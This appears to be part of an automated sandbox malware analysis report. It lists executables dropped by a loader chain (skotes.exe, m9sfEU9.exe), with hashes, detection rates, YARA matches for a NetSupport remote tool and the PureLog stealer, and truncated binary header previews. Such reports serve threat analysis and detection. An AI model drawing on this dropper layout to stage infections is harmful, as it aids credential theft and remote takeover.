                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\Public\Netstat\nskbfltr.inf

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        File Type:Windows setup INFormation
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                        Entropy (8bit):4.93007757242403
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                                                                                                                                        MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                                                                                                                                        SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                                                                                                                                        SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                                                                                                                                        SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                                                                                                                                                                                        C:\Users\Public\Netstat\pcicapi.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):33144
                                                                                                                                                                                                                                        Entropy (8bit):6.737780491933496
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                                                                                                                                                                        MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                                                                                                                                                                        SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                                                                                                                                                                        SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                                                                                                                                                                        SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\pcicapi.dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\Public\Netstat\remcmdstub.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):77224
                                                                                                                                                                                                                                        Entropy (8bit):6.793971095882093
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:zfafvTuNOwphKuyUHTqYXHhrXH4+LIyrxomee/+5IrAee/DIr3:jafLSpAFUzt0+LIyr7eR5IUeCIz
                                                                                                                                                                                                                                        MD5:325B65F171513086438952A152A747C4
                                                                                                                                                                                                                                        SHA1:A1D1C397902FF15C4929A03D582B09B35AA70FC0
                                                                                                                                                                                                                                        SHA-256:26DBB528C270C812423C3359FC54D13C52D459CC0E8BC9B0D192725EDA34E534
                                                                                                                                                                                                                                        SHA-512:6829555AB3851064C3AAD2D0C121077DB0260790B95BF087B77990A040FEBD35B8B286F1593DCCAA81B24395BD437F5ADD02037418FD5C9C8C78DC0989A9A10D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L...c..c.....................J.......!............@.......................... ............@....................................<.......T................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\m9sfEU9[1].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2138232
                                                                                                                                                                                                                                        Entropy (8bit):7.940321732008107
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:VIfzw6NbHHBp7k5hhJ+j0h7x0vRNu1UiPPs0EkHbG+nu:VILwYt5ShrfKvW0z
                                                                                                                                                                                                                                        MD5:E5F8753995C0B30B827AA2B17F3E1D22
                                                                                                                                                                                                                                        SHA1:B268EE165073321CB893FC6DC682ADBE38AF87B5
                                                                                                                                                                                                                                        SHA-256:C3A4EC523039D5969745279B8909FBB82BFC999D9241E24B5CEFEA23A3F2C04F
                                                                                                                                                                                                                                        SHA-512:DBA6104720C45C3201878C515DAC487B0F66522E85DB56CF19B4378D4DA94D38E640EB48259A6CA3FD8602B083283915BDEBDC8BB57039F1CDD2FE84792BA2FA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~............b......b..<....b.....)^......................................... ...... ......%...... ......Rich............PE..L...~.r\............................y.............@.......................................@............................4.......<.......4............................n..T...........................(...@...............\...T... ....................text...d........................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc...4...........................@..@.reloc........... ...z..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1880576
                                                                                                                                                                                                                                        Entropy (8bit):7.947827107801024
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:ZRGDbjz7g+LRMpnd6dc8dwpW+8cYsjL1i:ZRGDrky0nd6dcmUT8AjL1i
                                                                                                                                                                                                                                        MD5:FF279F4E5B1C6FBDA804D2437C2DBDC8
                                                                                                                                                                                                                                        SHA1:2FEB3762C877A5AE3CA60EEEBC37003AD0844245
                                                                                                                                                                                                                                        SHA-256:E115298AB160DA9C7A998E4AE0B72333F64B207DA165134CA45EB997A000D378
                                                                                                                                                                                                                                        SHA-512:C7A8BBCB122B2C7B57C8B678C5EED075EE5E7C355AFBF86238282D2D3458019DA1A8523520E1A1C631CD01B555F7DF340545FD1E44AD678DC97C40B23428F967
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................0J...........@..........................`J.....i.....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...xnuzvlhe.0..../......^..............@...tzuttanx..... J.....................@....taggant.0...0J.."..................@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4460032
                                                                                                                                                                                                                                        Entropy (8bit):7.985385064824602
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:uOsbw/GM4JTpF/dHkl1J000ReHSmC3J8qP/vbyN/I5i/H8CCW:1KGKJTpldHkl2mCbP/vbiN7C
                                                                                                                                                                                                                                        MD5:04869F7ACE61605035664AF9589AF21B
                                                                                                                                                                                                                                        SHA1:0688D7E4038F6103600011198EDECB98DF152221
                                                                                                                                                                                                                                        SHA-256:957A5B78C870C0C648884B8EE30F5F437325C94212F4436566CCCBC3B88AA987
                                                                                                                                                                                                                                        SHA-512:C78F3877D5ADB2847471B300D259B8875A8BA50A9FA1A1C3981C2A3316C8B5131E9D72D0E503557C14B4FD30A78B8D34C810AADE2EC6BDA4729DAF7FC2F8CCAE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2..........PD...@...................................E...@... ............................._.a.s.....a.....................`....................................................................................... . .pa......>(.................@....rsrc.........a......N(.............@....idata ......a......P(.............@... ..8...a......R(.............@...yxuskcgf.....0.......T(.............@...pwerqsbo.............C.............@....taggant.0......"....C.............@...........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2866176
                                                                                                                                                                                                                                        Entropy (8bit):6.525502925454382
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:HQVhw+9Pg4SnSuG7X6Mv+p7hE9YYBc9U6uq:HmhwUPg4SnSuG7X6xtEuYBc9Urq
                                                                                                                                                                                                                                        MD5:05BB24F8C4105C056E6B5250B2A5E488
                                                                                                                                                                                                                                        SHA1:08C3EE6A24FCF83ADC21D807371F5F01CA339892
                                                                                                                                                                                                                                        SHA-256:82CDD20CCD714049CE3DC46DD095B0CF2642789E69B74BC1397AD3AABE3EE3D8
                                                                                                                                                                                                                                        SHA-512:93622B8FF9166BCB33BD624900B7734DF4F1D9C60905917F17EDD762044FE89E2C167BAFE92C6C362CC4116CBEA6B8023EFFB28779D7F238F23581736596DD31
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........N...........@.......................... O.......,...@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@...ygtpparq. *...$...*..|..............@...zzjdxvxy......N.......+.............@....taggant.0....N.."....+.............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3286016
                                                                                                                                                                                                                                        Entropy (8bit):7.310046848182974
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:yla31k0wuMKWrJSYQTdfjfkn46z2jnVGd7jyy7qaJJR0BmXSyYO3:yla3/tS4K2jnVGRjHLJfV
                                                                                                                                                                                                                                        MD5:C00A67D527EF38DC6F49D0AD7F13B393
                                                                                                                                                                                                                                        SHA1:7B8F2DE130AB5E4E59C3C2F4A071BDA831AC219D
                                                                                                                                                                                                                                        SHA-256:12226CCAE8C807641241BA5178D853AAD38984EEFB0C0C4D65ABC4DA3F9787C3
                                                                                                                                                                                                                                        SHA-512:9286D267B167CBA01E55E68C8C5582F903BED0DD8BC4135EB528EF6814E60E7D4DDA2B3611E13EFB56AA993635FBAB218B0885DAF5DAEA6043061D8384AF40CA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....V...............P.../..Z......../.. ....0...@.. ........................2...........@.................................../.K.....0.@W...................`2.....3./.............................................. ............... ..H............text...../.. ..../................. ..`.rsrc...@W....0..X..../.............@..@.reloc.......`2......"2.............@..B................../.....H...........@.......C...@...z.*.........................................6+.(B.99(....*..:+.(.^A.(!...*.....*....(*...*.....*.......*.......*....(*...*..0..........(*...8y.......E....c...O.../...8^...s......... .....:....&8....s.........8....s......... .....9....& ....8....s......... ....8....*s.........8.......0.............*.0.............*.0.............*.0.............*.0.............*....*.......*....0.............*.0.............*....*....0.............*....*...".......

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\8ZVMneG[1].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):810496
                                                                                                                                                                                                                                        Entropy (8bit):7.808597434734726
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:grtEhokkSG4bPWQ8C8z3zcB49CNPWQ8C8z3zcB49Cx:grGhokkSG4bPWQv8z3BYNPWQv8z3BYx
                                                                                                                                                                                                                                        MD5:E8AF4D0D0B47AC68D762B7F288AE8E6E
                                                                                                                                                                                                                                        SHA1:1D65F31526CC20AB41D6B1625D6674D7F13E326C
                                                                                                                                                                                                                                        SHA-256:B83449768E7AF68867C8BC42B19FF012722D88EA66AEF69DF48661E63E0EB15E
                                                                                                                                                                                                                                        SHA-512:80FAD90314FF639F538A72C5E4CA2BF9AE52B9309CAA7CD6F87D61791505BB3612B7F3190AB9B67348C5D71F4D29BB9D101E3F66D525EB9B5E2060A10B2D187A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....^g.........."......f........................@.......................................@.....................................P....p..........................x...........................x.......................`...|............................text...md.......f.................. ..`.rdata..............n..............@..@.data...,%... ......................@....CODE........P....... .............. ..`.tls.........`.......0..............@....rsrc........p.......2..............@..@.reloc..x............4..............@..B.bss.................R..............@....bss.........0......................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UZAj8wc[1].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):957952
                                                                                                                                                                                                                                        Entropy (8bit):7.9986004015143015
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:24576:h2LddHrlBe4LpCuw8VYHcx5WK1zF7JkLYiY:mdZKspwDa5WK/JkLc
                                                                                                                                                                                                                                        MD5:5B99682CB740202D783DDE58CA97F045
                                                                                                                                                                                                                                        SHA1:CECAE054552CE295FEAA0717D2A33E870ADDCADD
                                                                                                                                                                                                                                        SHA-256:724E283E1BB29A150C9BEBC21BDF0E250E2D87257BF86C889BBE7544329C6882
                                                                                                                                                                                                                                        SHA-512:C37A2CB06407729344ADB85D814223A24EC4FA65F711C7F02C0E77395EC969B7E1BD64A6F5806D4E2D88C8461587D68B6AAE3378D2CF5C92F1ADE2AACC13F2B2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....dg................................. ........@.. ....................................`.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......h................!...............................................(....*..(....*.~....:....r...p.....(....o....s.........~....*.~....*.......*j(....r9..p~....o....t....*V.rI..p .......o....&*j(....(....r]..po....(....*2(.....o....*...0..g.........8.....(..........&......,.s......r...p(....o.....r...p(....o.....o .......io!..........9.....o".....*...................".6X....................lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, Pu

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1114112
                                                                                                                                                                                                                                        Entropy (8bit):7.7336985855739355
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:FAu2uOTJr0/sBIpMvVEDvtNNVpk3BLSx+ptEH76duCiheu2:4ugJAGIpMmZNNEBLSx4EHGxiC
                                                                                                                                                                                                                                        MD5:EF08A45833A7D881C90DED1952F96CB4
                                                                                                                                                                                                                                        SHA1:F04AEEB63A1409BD916558D2C40FAB8A5ED8168B
                                                                                                                                                                                                                                        SHA-256:33C236DC81AF2A47D595731D6FA47269B2874B281152530FDFFDDA9CBEB3B501
                                                                                                                                                                                                                                        SHA-512:74E84F710C90121527F06D453E9286910F2E8B6AC09D2AEB4AB1F0EAD23EA9B410C5D1074D8BC759BC3E766B5BC77D156756C7DF093BA94093107393290CED97
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.cg..............0......2........... ........@.. .......................`............@.....................................W.......H/...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H/.......0..................@..@.reloc.......@......................@..B........................H........<..........K.......`p...........................................Y?.F60...5..8....4zc.:.V........N.0...1.....O*.S..~.......I...pR..iI......Pn}...iJ!BH.+o/S..yj...8T'.}....y.I.kD.....'....$.6....}..w[. )...j..[.-..0....|...p....h\..L....R.T.~......b.K.h....".8.s`)...1... ....[i&.9....a?.F..N..~..._.^...Q.....43.L.....@v...x..IB.4...........|......(........~.Y.L.S..;..x.)w...v...:..2.....y.%{3w.)..^..7......@...7..k.H..p}."..%.p....0.g.3....g..

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4438776
                                                                                                                                                                                                                                        Entropy (8bit):7.99505709582503
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                                                                                        MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                                        SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                                                                                        SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                                                                                        SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[3].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1861120
                                                                                                                                                                                                                                        Entropy (8bit):7.948090750964882
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:1D3Z+og2dL7dT1TKvDXBujJ535WxkeQaJ4LAQJtbbY9mjrdprIt6vxM2c3WDLKoR:ZJTH/9hWxkeP2Mm7ra6pM2c3+XLl
                                                                                                                                                                                                                                        MD5:0A678F4E43E83079C1E95517F576A88D
                                                                                                                                                                                                                                        SHA1:4012A39B2F700273402D3ADBC54F0F87EAC2FA56
                                                                                                                                                                                                                                        SHA-256:6B17962E6298E3118F5301AF6BDCECCBF3C79663E4A526E128A5C306A232BC01
                                                                                                                                                                                                                                        SHA-512:C3EE30975F86B80DB6F8B0ED9A032924A12486528E0745D02E1E4372DE1775ECDA86CDD17C28586DCDDE1300A95C66579B707944DCDF445B21CCBA2F4FC6DF63
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................I...........@...........................I...........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... .@*..@.......\..............@...speiiqif....../......^..............@...suzusvsz.....pI......@..............@....taggant.0....I.."...D..............@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[4].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22016
                                                                                                                                                                                                                                        Entropy (8bit):5.338206717136569
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:78HIRrJs1HLBDhq5RWBNBlBThtq2uoyLizwxeNLHdWuNMV275RtAcL8SFS69rvwM:Qqls1HLBDhIRWbXlq2uVk75RuSFSm6EJ
                                                                                                                                                                                                                                        MD5:04F57C6FB2B2CD8DCC4B38E4A93D4366
                                                                                                                                                                                                                                        SHA1:61770495AA18D480F70B654D1F57998E5BD8C885
                                                                                                                                                                                                                                        SHA-256:51E4D0CBC184B8ABFA6D84E219317CF81BD542286A7CC602C87EB703A39627C2
